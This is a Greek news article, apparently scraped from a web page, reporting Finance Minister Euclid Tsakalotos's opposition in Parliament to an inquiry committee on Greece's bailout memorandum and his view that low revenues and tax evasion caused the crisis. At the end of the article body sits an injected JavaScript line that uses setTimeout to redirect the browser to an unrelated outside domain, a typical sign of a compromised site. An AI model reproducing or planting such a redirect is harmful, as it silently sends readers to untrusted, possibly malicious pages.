Αρνητικός σε εξεταστική για το μνημόνιο ο Τσακαλώτος

0
8

 

Μιλώντας στη Βουλή και απαντώντας σε σχετική ερώτηση του βουλευτή της ΝΔ Νικήτα Κακλαμάνη, ο υπουργός Οικονομικών Ευκλείδης Τσακαλώτος εμφανίστηκε αρνητικός στη σύσταση εξεταστικής επιτροπής που θα διερευνήσει τυχόν ευθύνες για την υπαγωγή της χώρας στο μνημόνιο..

Ο κ. Τσακαλώτος είπε πως η κυβέρνηση δεν έχει λάβει απόφαση για το αν θα συσταθεί σχετική εξεταστική, ωστόσο η προσωπική του άποψη είναι ότι οι επιτροπές αυτές δεν δίνουν απαντήσεις και ότι το θέμα θα έπρεπε να προσεγγιστεί επιστημονικά και να εξαχθούν πολιτικά συμπεράσματα.

Ο υπουργός Οικονομικών επεσήμανε ότι στο επίπεδο των δαπανών οι κυβερνήσεις της ΝΔ και του ΠΑΣΟΚ την περασμένη 10ετία δεν παρέκκλιναν από τον μ.ο. των αντίστοιχων δαπανών των άλλων ευρωπαϊκών κρατών.

Επίσης, όπως διευκρινισε, το πρόβλημα προκλήθηκε καθώς τα έσοδα ήταν περιορισμένα λόγω της φοροδιαφυγής και λόγω των μειωμένων φόρων, κάτι που ήταν επιλογή τόσο των κυβερνήσεων ΝΔ όσο και των κυβερνήσεων ΠΑΣΟΚ προκειμένου να χτίζουν κοινωνικές συμμαχίες. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here